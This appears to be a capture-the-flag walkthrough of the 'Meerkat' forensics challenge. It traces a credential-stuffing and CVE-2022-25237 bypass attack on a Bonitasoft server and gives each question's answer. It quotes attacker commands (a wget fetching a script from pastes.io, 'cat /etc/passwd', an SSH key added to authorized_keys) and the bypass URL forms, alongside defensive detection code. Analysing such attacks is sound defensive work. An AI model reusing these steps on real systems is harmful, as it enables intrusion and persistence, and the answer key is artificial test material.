Introduction to the Meerkat Challenge
I want to share some tips for approaching the Meerkat challenge.
Sherlock Scenario on Meerkat

A zip file has been provided, containing a .pcap file that captures network traffic from the timeframe of the suspected compromise. Additionally, a .json file is included, recording security events from the same period.
Tools used for the Meerkat Sherlock Challenge
PCAP data is most commonly analyzed with Wireshark.
For log data analysis, there are several options available, with jq being an excellent choice for parsing raw JSON data.
Questions of the Meerkat Sherlock
We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?

The request “GET /bonita HTTP/1.1” points to the Bonitasoft Business Process Management Software. This provides insight into the organisation’s platform and serves as a starting point for identifying any potential exploited vulnerabilities.
Answer: BonitaSoft
We believe the attacker may have used a subset of the brute forcing attack category – what is the name of the attack carried out?

The consistent traffic from a single IP address and its rapid submission rate strongly suggest a brute-force attack. More specifically, the use of predefined credential pairs, rather than testing multiple usernames with one password or one username with multiple passwords, indicates this is a credential-stuffing attack.
Answer: Credential Stuffing
Does the vulnerability exploited have a CVE assigned – and if so, which one?

Turning our attention to the JSON file, we can identify alerts associated with the attack by searching for “Login” events. This search quickly provides a strong lead, identifying CVE-2022-25237 in the logs.
Answer: CVE-2022-25237
What is CVE-2022-25237?

CVE-2022-25237 impacts Bonita Web 2021.2 and involves an authentication and authorization bypass vulnerability. The root cause lies in an overly broad exclude pattern within the RestAPIAuthorizationFilter. By appending ;i18ntranslation or /../i18ntranslation/ to a URL, unauthorized users can gain access to privileged API endpoints. This can be leveraged to execute privileged actions, potentially resulting in remote code execution.
Answer: i18ntranslation
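As an added example (not part of the original write-up), here is a small Python detector that flags request URIs carrying either bypass form described above, while leaving the legitimate i18ntranslation endpoint alone. The sample request lines are constructed, not taken from the challenge PCAP.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (method, URI); not taken from the challenge PCAP.
SAMPLE_REQUESTS = [
    ("GET", "/bonita/API/system/i18ntranslation?f=locale=en"),      # legitimate public endpoint
    ("POST", "/bonita/API/pageUpload;i18ntranslation?action=add"),  # ';i18ntranslation' form
    ("GET", "/bonita/API/extension/rce/../i18ntranslation/"),       # '/../i18ntranslation/' form
    ("GET", "/bonita/API/pageUpload%3Bi18ntranslation"),            # same marker, percent-encoded
    ("GET", "/bonita/portal/homepage"),
]

PATH_PARAM_FORM = re.compile(r";i18ntranslation", re.IGNORECASE)
TRAVERSAL_FORM = re.compile(r"/\.\./i18ntranslation/", re.IGNORECASE)


def normalise_uri(uri):
    """Percent-decode repeatedly so encodings such as %3B or %252e cannot hide the marker."""
    previous = None
    while previous != uri:
        previous, uri = uri, unquote(uri)
    return uri


def bypass_variant(uri):
    """Return 'path-param', 'traversal' or None for a single request URI."""
    path = normalise_uri(uri).split("?", 1)[0]  # the marker lives in the path, not the query
    if PATH_PARAM_FORM.search(path):
        return "path-param"
    if TRAVERSAL_FORM.search(path):
        return "traversal"
    return None  # a plain /i18ntranslation path segment is the real endpoint, not a bypass


def find_bypass_attempts(requests):
    """Filter a request list down to the ones carrying a CVE-2022-25237 marker."""
    return [(method, uri, bypass_variant(uri))
            for method, uri in requests if bypass_variant(uri)]
```

In a real triage the request list would come from Wireshark's exported HTTP requests or the JSON alerts, matched against the same two forms.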
How many combinations of usernames and passwords were used in the credential-stuffing attack?

To analyze the PCAP, I applied the filter http.request.uri, which typically displays one packet per HTTP request along with the corresponding endpoint in the Info field. The first 117 packets are from IP address 156.146.62.213 to 172.31.6.44, now confirmed as Forela’s Bonitasoft server. Within this stream, we observe multiple POST requests, each resulting in a 401 response code, indicating invalid credentials. In total, 56 unique username-password combinations were attempted during this activity.
Answer: 56
Which username and password combination was successful?

Upon analyzing the PCAP file, we see a login attempt using the username “seb.broom@forela.co.uk” and the password “g0vernm3nt,” which returns an HTTP code 204, indicating successful authentication. Additionally, the requests include a User-Agent string from the Python requests library, which implies they are likely from a script, fitting the pattern of a brute-force attack.
Answer: seb.broom@forela.co.uk:g0vernm3nt
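As an added example (not part of the original write-up, and run on constructed login records rather than the challenge PCAP), the following Python groups login POSTs by source address, counts unique credential pairs (duplicate submissions are why a raw request count differs from the combination count), estimates the submission rate, separates credential stuffing from password spraying and single-user brute force, and pulls out any attempt answered with HTTP 204.

```python
from datetime import datetime

# Constructed login records (timestamp, source IP, username, password, HTTP status);
# not taken from the challenge PCAP.
SAMPLE_LOGINS = [
    ("2024-01-01T10:00:00", "198.51.100.7", "alice@example.test", "Winter2023!", 401),
    ("2024-01-01T10:00:01", "198.51.100.7", "bob@example.test", "hunter2", 401),
    ("2024-01-01T10:00:01", "198.51.100.7", "carol@example.test", "letmein", 401),
    ("2024-01-01T10:00:02", "198.51.100.7", "dave@example.test", "Pa55w0rd", 401),
    ("2024-01-01T10:00:02", "198.51.100.7", "alice@example.test", "Winter2023!", 401),  # duplicate pair
    ("2024-01-01T10:00:03", "198.51.100.7", "erin@example.test", "Spring2024", 401),
    ("2024-01-01T10:00:04", "198.51.100.7", "frank@example.test", "g0ld3n", 204),      # accepted
    ("2024-01-01T10:30:00", "203.0.113.9", "erin@example.test", "Spring2024", 401),
]


def classify_attack(pairs, min_pairs=5):
    """Label a set of (username, password) pairs seen from one source."""
    users = {u for u, _ in pairs}
    passwords = {p for _, p in pairs}
    if len(pairs) < min_pairs:
        return "too few attempts"
    if len(users) == 1:
        return "brute force (one user, many passwords)"
    if len(passwords) == 1:
        return "password spraying (one password, many users)"
    if len(pairs) == len(users):  # every user tried with exactly one password
        return "credential stuffing (one password per user)"
    return "mixed"


def summarise_by_source(logins):
    """Per source IP: attempt count, unique pairs, submission rate, label and successes."""
    by_ip = {}
    for ts, ip, user, pw, status in logins:
        by_ip.setdefault(ip, []).append((datetime.fromisoformat(ts), user, pw, status))
    report = {}
    for ip, rows in by_ip.items():
        pairs = {(u, p) for _, u, p, _ in rows}
        span = (max(r[0] for r in rows) - min(r[0] for r in rows)).total_seconds()
        report[ip] = {
            "attempts": len(rows),
            "unique_pairs": len(pairs),
            "per_second": round(len(rows) / span, 2) if span else None,
            "label": classify_attack(pairs),
            "successful": [(u, p) for _, u, p, s in rows if s == 204],
        }
    return report
```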
If any, which text-sharing site did the attacker utilise?

At this point, the attacker’s IP address changes from 156.146.62.213 to 138.199.59.221.
However, it’s reasonable to assume that this is the same attacker or at least someone linked to the original attacker, as they resume the attack within one minute of the initial brute force attack’s conclusion. The attacker uses the compromised credentials to log back in, re-upload the rce_api_extension.zip file, configure it as before, and execute another set of commands via a GET request. This time, they run “cat /etc/passwd” to enumerate all user accounts on the web server, along with details for each. Once again, the attacker deletes the zip file to erase evidence.
A new action occurs here. The attacker uploads the zip file again as before and issues a GET request, but this time the command is “wget https://pastes.io/raw/bx5gcr0et8.”
Answer: pastes.io
Please provide the filename of the public key used by the attacker to gain persistence on our host.

I have the URL for the downloaded script, and it may still be accessible as shown above. Upon reviewing the previously analyzed file, we can see that the new SSH key was appended to the list of keys in /home/ubuntu/.ssh/authorized_keys.
Answer: hffgra4unv
Can you confirm the file modified by the attacker to gain persistence?
The answer to question 9 appears above.
Answer: /home/ubuntu/.ssh/authorized_keys
Can you confirm the MITRE technique ID of this type of persistence mechanism?

The MITRE ATT&CK ID for Account Manipulation via SSH Authorized Keys is T1098.004 (Task 10). Reviewing MITRE’s ATT&CK Matrix, we can identify a TTP that aligns with the attacker’s actions: SSH Authorized Keys (T1098.004), categorized under Account Manipulation in the Persistence column.
Answer: T1098.004